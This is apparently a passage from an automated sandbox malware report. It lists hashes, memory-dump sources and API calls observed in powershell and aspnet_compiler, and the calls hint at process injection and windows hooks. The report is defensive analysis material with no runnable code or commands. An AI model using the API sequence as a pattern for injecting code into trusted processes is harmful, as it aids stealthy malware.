                                                                                                          • Instruction Fuzzy Hash: 712149A3A1DB4A4FE396BB7C9901174BAC2EF8531074860FBD60DC31A3DD1AEC178281
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2038885953.00007FFB4B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b230000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 48cd314db1731ddc9ce28919ff1f839fb23a32ba0280a4426cd2f049cd1b1991
                                                                                                          • Instruction ID: be133d13bc444ac0b122df868b6f0c3e08c60598ed73a7c99a0158c4b62e70d5
                                                                                                          • Opcode Fuzzy Hash: 48cd314db1731ddc9ce28919ff1f839fb23a32ba0280a4426cd2f049cd1b1991
                                                                                                          • Instruction Fuzzy Hash: 391159A3B1DB850FE35A7A7CA8460B4FBC2EF8962175451BEE14DC3193EC196C13439A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2038885953.00007FFB4B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b230000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c5a3b9fbda49928f31214813c98b5c7d4bb9afe1839a86261d80f8a11c7f62c0
                                                                                                          • Instruction ID: 61469d430e28c634f7a1f51bbc339b2e7de641424298ff33b310a19b3e1635bb
                                                                                                          • Opcode Fuzzy Hash: c5a3b9fbda49928f31214813c98b5c7d4bb9afe1839a86261d80f8a11c7f62c0
                                                                                                          • Instruction Fuzzy Hash: 3AF0F662B0C9068EE799BA3CE6455B4FAE2EF8422075455BAD34DC2067DE1AF8128281
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2038885953.00007FFB4B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b230000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4bda668fe3c4cc6a2367ca459d9e0b7eab6ac2e96b47e3d3cf6ef80ab0e5dac9
                                                                                                          • Instruction ID: e5ec9d73e01b58fb5b1f8f52eca72fb35a93c75e50c59d31ea9ca433f13fb84a
                                                                                                          • Opcode Fuzzy Hash: 4bda668fe3c4cc6a2367ca459d9e0b7eab6ac2e96b47e3d3cf6ef80ab0e5dac9
                                                                                                          • Instruction Fuzzy Hash: 9CE026A3F0E92E0AF2A2B97C6A463F5E6C0DF4462070421B3DA4CC3162ED089C2043E0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2037436111.00007FFB4B160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B160000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b160000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 33c13202877648b25b237d4c364fbeb3c5e9663238d349d56e566aada1d6d826
                                                                                                          • Instruction ID: 8ca6d4958d20b2dd384359106a676f548babca5e937c30bec83f0444b636a20c
                                                                                                          • Opcode Fuzzy Hash: 33c13202877648b25b237d4c364fbeb3c5e9663238d349d56e566aada1d6d826
                                                                                                          • Instruction Fuzzy Hash: 1F42087092CA894FEB64EF28C905BA577E0FF55304F14817DDA8DC72A2DA34A945CB81
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2037436111.00007FFB4B160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B160000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b160000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ba486156474fac962f86e3060b63f583d63114318e3c28d3f6bb8baf0b24aae2
                                                                                                          • Instruction ID: 0059f83ac4dec97b9927a2d5b4b1264848fbcdfc871d61b96675828e31caad9d
                                                                                                          • Opcode Fuzzy Hash: ba486156474fac962f86e3060b63f583d63114318e3c28d3f6bb8baf0b24aae2
                                                                                                          • Instruction Fuzzy Hash: E212F77052CA4A8FEBA4EF28C905BB577D1FF54314F108179DA8DC72A2DE34E9458B81
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2037436111.00007FFB4B160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B160000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b160000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8c0ca57dc1da8f1860cfe113ec53f0b5504492b5ea9c5b9bd7b48b79b1e6acf1
                                                                                                          • Instruction ID: 0763fe43c4d2a1f0431ee4f9ca9c407bd811f53715eb9349aef1f61ea7aa1235
                                                                                                          • Opcode Fuzzy Hash: 8c0ca57dc1da8f1860cfe113ec53f0b5504492b5ea9c5b9bd7b48b79b1e6acf1
                                                                                                          • Instruction Fuzzy Hash: D54172C6A1E6C64FE3436B3CA9750EA7F60EF5326970941FBCAC5860A3DD09640B8721
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2038885953.00007FFB4B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b230000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0J8K$0J8K$0J8K$0J8K$0J8K
                                                                                                          • API String ID: 0-854148929
                                                                                                          • Opcode ID: a5c51b594a35664f3080ed7c2afc82c3c2c3f627ccac2ef9f17a63edadd5b41b
                                                                                                          • Instruction ID: e542eaff71bfe1d6f1cf74edc4d1529b583b709e610a591ecaf14a6018683b68
                                                                                                          • Opcode Fuzzy Hash: a5c51b594a35664f3080ed7c2afc82c3c2c3f627ccac2ef9f17a63edadd5b41b
                                                                                                          • Instruction Fuzzy Hash: 3FE1F3B290DAC54FE796FF78C864664BFE1EF56300B1840EED189CF1A3DA289845C751

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:7.5%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:12
                                                                                                          Total number of Limit Nodes:0

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.1827599679.00007FFB4B160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B160000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ffb4b160000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 963392458-0
                                                                                                          • Opcode ID: 323caf7fca98a150950425a424931ee5d9925dab01e93d4538a54dbbf79d33e7
                                                                                                          • Instruction ID: 9ba2705a24d82e0d8ee74bf45c6c9f18c077f91f6ce73cc391176daf77e620ca
                                                                                                          • Opcode Fuzzy Hash: 323caf7fca98a150950425a424931ee5d9925dab01e93d4538a54dbbf79d33e7
                                                                                                          • Instruction Fuzzy Hash: AE025C70919A8D8FEBB8EF28C8597E977E1FB59301F00416ED80ECB291DB749645CB81

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.1827599679.00007FFB4B160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B160000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ffb4b160000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0
                                                                                                          • Opcode ID: c7692baceb82cc62891fe3e6a3a2941ca5e0012dd64890bee6bfb2a336d70230
                                                                                                          • Instruction ID: fc8a94710fdd7b0806e102bcbf78cf75cef20c0b2ad398e6fe712da889932b15
                                                                                                          • Opcode Fuzzy Hash: c7692baceb82cc62891fe3e6a3a2941ca5e0012dd64890bee6bfb2a336d70230
                                                                                                          • Instruction Fuzzy Hash: F5614B70908A1D8FDB94EF68C885BE9BBF1FB69311F1081AAD44CE3255DB74A985CF40

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.1827599679.00007FFB4B160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B160000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ffb4b160000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: 3d42ca37f3125b58f671d65d1ba8c4aef8eb0b0a0396a1814782f2a3b8d4468e
                                                                                                          • Instruction ID: 8a3327f806d425af1bfcf7094a0c5531330182cb92f35d79f47010daad26f4ed
                                                                                                          • Opcode Fuzzy Hash: 3d42ca37f3125b58f671d65d1ba8c4aef8eb0b0a0396a1814782f2a3b8d4468e
                                                                                                          • Instruction Fuzzy Hash: E6514A70908A4D8FEB54EFA8C889BEDBBF1FB55311F1082AAD048E3255CB74A485CF40

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.1827599679.00007FFB4B160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B160000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ffb4b160000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ResumeThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 947044025-0
                                                                                                          • Opcode ID: c16adbadcd9eba0e302be7a73e6c7909c5efd521eb5c8d1a8a271e4a4ede7123
                                                                                                          • Instruction ID: a8e3b54ca89c67ab9d2da775a41d80439f57bb04816ec5c0774d9aecaee6c1c6
                                                                                                          • Opcode Fuzzy Hash: c16adbadcd9eba0e302be7a73e6c7909c5efd521eb5c8d1a8a271e4a4ede7123
                                                                                                          • Instruction Fuzzy Hash: C2518A70D0C78D8FDB55EFA8C885AE9BBB0EF56310F0041AAD449E7292DA74A486CF51

                                                                                                          Control-flow Graph

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.1828119793.00007FFB4B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ffb4b230000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d73dcbf3ba1f0a23d83d70402efa8c91dc682124293e8276a34dfaa012b1c571
                                                                                                          • Instruction ID: 4481654f49f6271124cdcaa7363c910afee2f2f1ce5db63287f1e5ae1ce2bce0
                                                                                                          • Opcode Fuzzy Hash: d73dcbf3ba1f0a23d83d70402efa8c91dc682124293e8276a34dfaa012b1c571
                                                                                                          • Instruction Fuzzy Hash: 8CA14962A0DBC50FE796BB3C98551B5BFD1EF86210B0841FFD189C71A3DD189D068392

                                                                                                          Control-flow Graph

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.1828119793.00007FFB4B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ffb4b230000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0e7f2aa5f691d99420bf6b0b221d83ae6907db87afd20edd87d89eaf3eb30420
                                                                                                          • Instruction ID: 54611ad28c6db1c429389988a2ccc708db8640e5ef1b8c35f3fa3d75c9ff83d7
                                                                                                          • Opcode Fuzzy Hash: 0e7f2aa5f691d99420bf6b0b221d83ae6907db87afd20edd87d89eaf3eb30420
                                                                                                          • Instruction Fuzzy Hash: BA223BA2A1DBC54FEB96BB3C8865574BFE1DF56210B0841FBD589C70A3DD18AC06C351

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:6.9%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:44
                                                                                                          Total number of Limit Nodes:5

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00CC7CFE
                                                                                                          • GetCurrentThread.KERNEL32 ref: 00CC7D3B
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00CC7D78
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00CC7DD1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000015.00000002.3895328928.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_21_2_cc0000_aspnet_compiler.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Current$ProcessThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2063062207-0
                                                                                                          • Opcode ID: 894ee020491a20ca1ddc531f1ec21e22a6f48bf258a879e5fc056447146b8068
                                                                                                          • Instruction ID: fe032a1cfcb20440fa191aee31b2a7e9b169792b8676d1b33defa92361185b78
                                                                                                          • Opcode Fuzzy Hash: 894ee020491a20ca1ddc531f1ec21e22a6f48bf258a879e5fc056447146b8068
                                                                                                          • Instruction Fuzzy Hash: 185143B090034A8FDB18DFAAD548BAEBBF5EF88314F208459E419A7390DB745984CF65

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00CC7CFE
                                                                                                          • GetCurrentThread.KERNEL32 ref: 00CC7D3B
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00CC7D78
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00CC7DD1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000015.00000002.3895328928.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_21_2_cc0000_aspnet_compiler.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Current$ProcessThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2063062207-0
                                                                                                          • Opcode ID: 80049620deb079d49f10a9a38d56af9aaca5017ef5bfcb75bdcfcc5157db550a
                                                                                                          • Instruction ID: 82bda28f9c0d3eb8646c242c57445f1ae9b3133d5c26a18f0563baec083b9e11
                                                                                                          • Opcode Fuzzy Hash: 80049620deb079d49f10a9a38d56af9aaca5017ef5bfcb75bdcfcc5157db550a
                                                                                                          • Instruction Fuzzy Hash: B25144B09003498FDB18DFAAD548BAEBBF5EF88314F20845DE419A7390DB745984CF65

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CC7F4F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000015.00000002.3895328928.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_21_2_cc0000_aspnet_compiler.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DuplicateHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3793708945-0

Control-flow Graph
• Basic blocks: 184 (cc7ec8-cc7f5c, calls DuplicateHandle), 185 (cc7f5e-cc7f64), 186 (cc7f65-cc7f82)
• Edges: 184->185, 184->186, 185->186
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CC7F4F
Memory Dump Source
• Source File: 00000015.00000002.3895328928.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
• Joe Sandbox IDA Plugin Snapshot File: hcaresult_21_2_cc0000_aspnet_compiler.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0

Control-flow Graph
• Basic blocks: 189 (cc29c4-cc2a12), 191 (cc2a1e-cc2a50, calls SetWindowsHookExW), 192 (cc2a14), 193 (cc2a59-cc2a7e), 194 (cc2a52-cc2a58), 195 (cc2a1c)
• Edges: 189->191, 189->192, 191->193, 191->194, 192->195, 194->193, 195->191
APIs
• SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00CC2A43
Memory Dump Source
• Source File: 00000015.00000002.3895328928.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
• Joe Sandbox IDA Plugin Snapshot File: hcaresult_21_2_cc0000_aspnet_compiler.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0

Control-flow Graph
• Basic blocks: 199 (cc29c8-cc2a12), 201 (cc2a1e-cc2a50, calls SetWindowsHookExW), 202 (cc2a14), 203 (cc2a59-cc2a7e), 204 (cc2a52-cc2a58), 205 (cc2a1c)
• Edges: 199->201, 199->202, 201->203, 201->204, 202->205, 204->203, 205->201
APIs
• SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00CC2A43
Memory Dump Source
• Source File: 00000015.00000002.3895328928.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
• Joe Sandbox IDA Plugin Snapshot File: hcaresult_21_2_cc0000_aspnet_compiler.jbxd
Similarity
• API ID: HookWindows
• String ID:
• API String ID: 2559412058-0

Control-flow Graph
• Basic blocks: 209 (ccd518-ccd574), 211 (ccd576-ccd59e, calls KiUserCallbackDispatcher), 212 (ccd5c2-ccd5db), 213 (ccd5a7-ccd5bb), 214 (ccd5a0-ccd5a6)
• Edges: 209->211, 209->212, 211->213, 211->214, 213->212, 214->213
APIs
• KiUserCallbackDispatcher.NTDLL(0000004B), ref: 00CCD58D
Memory Dump Source
• Source File: 00000015.00000002.3895328928.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
• Joe Sandbox IDA Plugin Snapshot File: hcaresult_21_2_cc0000_aspnet_compiler.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0